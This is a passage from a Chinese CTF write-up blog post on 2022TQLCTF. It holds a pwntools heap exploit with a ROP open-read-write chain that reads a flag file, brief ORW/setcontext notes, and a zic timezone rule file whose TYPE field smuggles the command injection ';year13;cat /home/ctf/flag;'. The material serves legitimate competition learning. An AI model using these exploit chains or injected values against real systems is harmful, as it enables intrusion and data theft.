str(sig)</span><br><span class="line">payload += sig[<span class="number">0x28</span>:]</span><br><span class="line">s.send(<span class="string">'A'</span>*<span class="number">0x28</span>+p64(<span class="number">0x81</span>)+p64(libc.sym[<span class="string">'__free_hook'</span>])+payload)</span><br><span class="line">pop_rdi = <span class="number">0x0000000000026b72</span>+libc.address</span><br><span class="line">pop_rsi = <span class="number">0x0000000000027529</span>+libc.address</span><br><span class="line">pop_rdx_r12 = <span class="number">0x000000000011c371</span> + libc.address</span><br><span class="line">payload = p64(pop_rdi)+p64(libc.bss(<span class="number">0x600</span>))+p64(pop_rsi)+p64(<span class="number">0</span>)+p64(libc.sym[<span class="string">'open'</span>])</span><br><span class="line">payload +=</span><br><span class="line">p64(pop_rdi)+p64(<span class="number">3</span>)+p64(pop_rsi)+p64(libc.bss(<span class="number">0x700</span>))+p64(pop_rdx_r12)+p64(<span class="number">0x100</span>)+p64(<span class="number">0</span></span><br><span class="line">)+p64(libc.sym[<span class="string">'read'</span>])</span><br><span class="line">payload +=</span><br><span class="line">p64(pop_rdi)+p64(<span class="number">1</span>)+p64(pop_rsi)+p64(libc.bss(<span class="number">0x700</span>))+p64(pop_rdx_r12)+p64(<span class="number">0x100</span>)+p64(<span class="number">0</span></span><br><span class="line">)+p64(libc.sym[<span class="string">'write'</span>])</span><br><span class="line">payload = payload.ljust(<span class="number">0x100</span>)+<span class="string">"./flag\x00"</span></span><br><span class="line">s.send(payload)</span><br><span class="line">s.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="orw"><a href="#orw" class="headerlink" title="orw"></a>orw</h3><p>总结下ORW，做题还是发现自己ORW写的太慢了</p>
<p><a href="https://www.cnblogs.com/pwnfeifei/p/15819825.html" target="_blank" rel="noopener">setcontext+orw - 狒猩橙 - 博客园 (cnblogs.com)</a></p>
<p><a href="https://x1ng.top/2021/10/28/pwn-orw总结/" target="_blank" rel="noopener">PWN-ORW总结 - X1ng’s Blog</a></p>
<p>setcontext部分我们可以用pwntools里的SigreturnFrame去构建</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220302095520595.png" alt="image-20220302095520595"></p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220302095548141.png" alt="image-20220302095548141"></p>
<p>SigreturnFrame就是根据这里rdi的偏移构造数据的，比如sig.rsp就会把数据填到offset 0xA0处</p>
<p>主要是方便我们构造</p>
<p>一次控制流劫持后，后面大体有两种利用方法，第一种是直接控制程序执行流去执行ROP链，因此关键在于得找一片地方存放ROP链，一般就是在堆中，另外要用setcontext修改rsp，</p>
<p>第二种是先用mprotect开辟一片可读可写可执行的内存，然后通过read把shellcode读到上面来执行</p>
<h2 id="timezone-challenge"><a href="#timezone-challenge" class="headerlink" title="timezone_challenge"></a>timezone_challenge</h2><p>挺离谱的一个漏洞点，文件就不分析了，就是接收命令然后执行zic，那就只能看zic了</p>
<p><a href="https://docs.oracle.com/cd/E88353_01/html/E72487/zic-8.html" target="_blank" rel="noopener">zic - man pages section 8: System Administration Commands (oracle.com)</a></p>
<p>翻一下16.04的zic man手册</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220302101844205.png" alt="image-20220302101844205"></p>
<p>这里存在一个命令注入，代码中确实也有这个点</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220302101927734.png" alt="image-20220302101927734"></p>
<p>那下面就是构造数据了，man里面有example，我们只要修改下type就行</p>
<p>最终构造出来是这个,Rule中设置一个type是command，然后要有一个zone引用到这个Rule，要不然不会触发</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"># Rule  NAME  FROM  TO    TYPE  IN   ON       AT    SAVE  LETTER/S</span><br><span class="line">Rule    Swiss 1941  1942  &quot;;year13;cat /home/ctf/flag;&quot;     May  Mon&gt;=1   1:00  1:00  S</span><br><span class="line">Rule    Swiss 1941  1942  -     Oct  Mon&gt;=1   2:00  0     -</span><br><span class="line">Rule    EU    1977  1980  -     Apr  Sun&gt;=1   1:00u 1:00  S</span><br><span class="line">Rule    EU    1977  only  -     Sep  lastSun  1:00u 0     -</span><br><span class="line">Rule    EU    1978  only  -     Oct   1       1:00u 0     -</span><br><span class="line">Rule    EU    1979  1995  -     Sep  lastSun  1:00u 0     -</span><br><span class="line">Rule    EU    1981  max   -     Mar  lastSun  1:00u 1:00  S</span><br><span class="line">Rule    EU    1996  max   -     Oct  lastSun  1:00u 0     -</span><br><span class="line"></span><br><span class="line">Zone   Europe/Zurich 0:34:08 Swiss	LMT    1848 Sep 12</span><br><span class="line">			  0:29:44 Swiss	BMT    1894 Jun</span><br><span class="line">			  1:00	  Swiss CE%sT  1981</span><br><span class="line">			  1:00	  EU	CE%sT</span><br><span class="line">IMDONE</span><br></pre></td></tr></table></figure>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2022/02/13/HWS2022/" rel="next" title="HWS2022 复现WP">
                <i class="fa fa-chevron-left"></i> HWS2022 复现WP
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2022/03/22/2022hufuCTF/" rel="prev" title="2022hufuCTF">
                2022hufuCTF <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/head.jpg" alt="zzrR0">
            
              <p class="site-author-name" itemprop="name">zzrR0</p>
              <p class="site-description motion-element" itemprop="description">Why am i so cai.</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">19</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">5</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
            </nav>
          

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://xmzyshypnc.github.io/" title="xmzyshypnc" target="_blank">xmzyshypnc</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://wood1314.github.io/" title="Wood" target="_blank">Wood</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.zeddyu.info/" title="Zedd" target="_blank">Zedd</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://kestudy.top/" title="Ke" target="_blank">Ke</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#2022TQLCTF-WP"><span class="nav-number">1.</span> <span class="nav-text">2022TQLCTF WP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#unbelievable-write"><span class="nav-number">1.1.</span> <span class="nav-text">unbelievable_write</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#exp-简要分析"><span class="nav-number">1.1.1.</span> <span class="nav-text">exp + 简要分析</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#EZVM"><span class="nav-number">1.2.</span> <span class="nav-text">EZVM</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#题目分析"><span class="nav-number">1.2.1.</span> <span class="nav-text">题目分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#tcache-attack"><span class="nav-number">1.2.2.</span> <span class="nav-text">tcache attack</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用"><span class="nav-number">1.2.3.</span> <span class="nav-text">利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp"><span class="nav-number">1.2.4.</span> <span class="nav-text">exp</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#orw"><span class="nav-number">1.2.5.</span> <span class="nav-text">orw</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#timezone-challenge"><span class="nav-number">1.3.</span> <span class="nav-text">timezone_challenge</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zzrR0</span>

  

  
</div>




  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Pisces</a> v6.3.0</div>






        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="总访客量">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="总访问量">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  













  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  

  
    <script id="dsq-count-scr" src="https://xmzyshypnc.disqus.com/count.js" async></script>
  

  
    <script type="text/javascript">
      var disqus_config = function () {
        this.page.url = 'http://yoursite.com/2022/03/02/2022TQLCTFWP/';
        this.page.identifier = '2022/03/02/2022TQLCTFWP/';
        this.page.title = '2022TQLCTF WP';
        };
      function loadComments () {
        var d = document, s = d.createElement('script');
        s.src = 'https://xmzyshypnc.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      }
      
        loadComments();
      
    </script>
  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
  
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(function (item) {
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: true,
        notify: true,
        appId: 'YbpHIa6XHNsKv4wX2wGjnrK7-gzGzoHsz',
        appKey: '1fjf9mQl90nKdRPfq1zhDyIE',
        placeholder: '',
        avatar:'mm',
        meta:guest,
        pageSize:'10' || 10,
        visitor: true
    });
  </script>



  





  

  

  

  

  
  

  

  

  

  

  

  
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"live2d-widget-model-hijiki"},"display":{"superSample":2,"width":150,"height":300,"position":"right","hOffset":0,"vOffset":-50},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.2},"log":false,"tagMode":false});</script></body>
</html>
